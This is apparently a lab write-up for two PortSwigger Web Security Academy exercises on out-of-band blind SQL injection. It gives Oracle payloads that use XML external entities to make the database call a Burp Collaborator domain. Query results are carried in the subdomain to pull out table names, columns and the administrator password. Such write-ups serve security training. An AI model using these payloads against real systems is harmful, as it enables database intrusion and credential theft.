PortSwigger - Out Of Band SQL

[ToC] # What is OAST ? In some case,the application vulnerable to SQL injection, **but does it asynchronously**. The application continues processing the user's request in the original thread, and uses another thread to execute a SQL query => the application's response doesn't depend on whether the *query returns any data*, or on whether a *database error occurs*, or on the *time taken* to execute the query => none of the techniques described so far will work. :::info In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering **out-of-band** network interations to a system that you control ::: A variety of network protocols can be used for this purpose, but typically the most effective is DNS. This because very many production networks allow free egrees of DNS queries, because they are essential for the normal operation of production systems. ### PRACTITIONER Lab: Blind SQL injection with out-of-band interaction The techiques for triggering a DNS query are highly specific to the type of database being used. In here I will use payload from [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) ![](https://hackmd.io/_uploads/SyhSqCtT3.png) The above payloads will inject a query that causes the database server to perform a DNS lookup to `BURP-COLLABORATOR-SUBDOMAIN` - the domain we created form Burp Collaborator Then if the Collaborator receive any DNS lookups => **Server is vulnerable to SQL injection and we can confirm the database type base on the payload that causes the DNS lookup** In this lab we will need to use Burp Collaborator. After Start Collaborator, we will need copy the domain ![](https://hackmd.io/_uploads/r1MlxJ5p3.png) ``` 2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com ``` Now we will test each payload if it can trigger DNS lookup **Oracle** With each payload we will need to edit it a litte bit - add single quotes`'` to close the string TrackingId - use string connection `||` to add another select statement - replace `BURP-COLLABORATOR-SUBDOMAIN` with the domain we copy from Burp Collaborator Payload from cheat sheet: ```sql! SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual ``` Payload: ```sql! ' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` ![](https://hackmd.io/_uploads/S1VViJc62.png) After send it, we will need to check Collaborator server ![](https://hackmd.io/_uploads/BJlui1qph.png) => Tracking Id vulnerable to SQL injection, and database type is Oracle ![](https://hackmd.io/_uploads/BJTvTyqph.png) :::success **Solved** :+1: ::: ### PRACTITIONER Lab: Blind SQL injection with out-of-band data exfiltration **1. Comfirming SQL injection vulnerable** We will use the same technique in previous lab to comfirm the vulnerable and check the database type **Oracle** With each payload we will need to edit it a litte bit - add single quotes`'` to close the string TrackingId - use string connection `||` to add another select statement - replace `BURP-COLLABORATOR-SUBDOMAIN` with the domain we copy from Burp Collaborator Payload from cheat sheet: ```sql! SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual ``` Payload: ```sql! ' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` ![](https://hackmd.io/_uploads/rJ1Uyg963.png) Result in Collaborator server: ![](https://hackmd.io/_uploads/BJALye5pn.png) => Tracking Id vulnerable to SQL injection, and database type is Oracle **2. Figure out the database type and version :heavy_check_mark:** **3. Guessing table name** An interesting a figure out that the DNS lookup will also work with sub domain Example: Here I try to inject a sub domain ``` abc.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com ``` ![](https://hackmd.io/_uploads/HJiTBe5T2.png) And we can see the sub domain in Description tab ![](https://hackmd.io/_uploads/rJsKIlcT3.png) So if we try to SELECT from database then concat the result with domain as a sub domain, we can easily read the query result from the Collaborator Server :smiley: Let's check our theory Payload from cheat sheet: ```sql! SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual ``` Payload: ```sql! ||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT 1 FROM dual)||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` ![](https://hackmd.io/_uploads/B1fl9gcT2.png) Result: ![](https://hackmd.io/_uploads/Hykz9lqan.png) Bingo :3 Now can easily exaiming the database Use this payload to check if there are any table names `USERS` ```sql! '||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT table_name FROM all_tables WHERE table_name='USERS')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` Result: ![](https://hackmd.io/_uploads/BydKsgq62.png) **4. Guessing column name** Use this payload to check if the table contain column `username` and column `password` Payload: ```sql! '||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS'AND column_name = 'USERNAME')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` Result: ![](https://hackmd.io/_uploads/S1JKpgcp3.png) Payload: ```sql! '||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS'AND column_name = 'PASSWORD')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` Result: ![](https://hackmd.io/_uploads/r1_TaxqT3.png) **5. Guessing username and password** Payload: ```sql! '||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT USERNAME FROM USERS WHERE USERNAME = 'administrator')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` Result: ![](https://hackmd.io/_uploads/rkL8AlqT2.png) Payload: ```sql! '||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT PASSWORD FROM USERS WHERE USERNAME = 'administrator')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) -- ``` Result: ![](https://hackmd.io/_uploads/HJeUjRg96h.png) **6. Login to admin account** ![](https://hackmd.io/_uploads/S1deJbqph.png) :::success **Solved** :+1: :::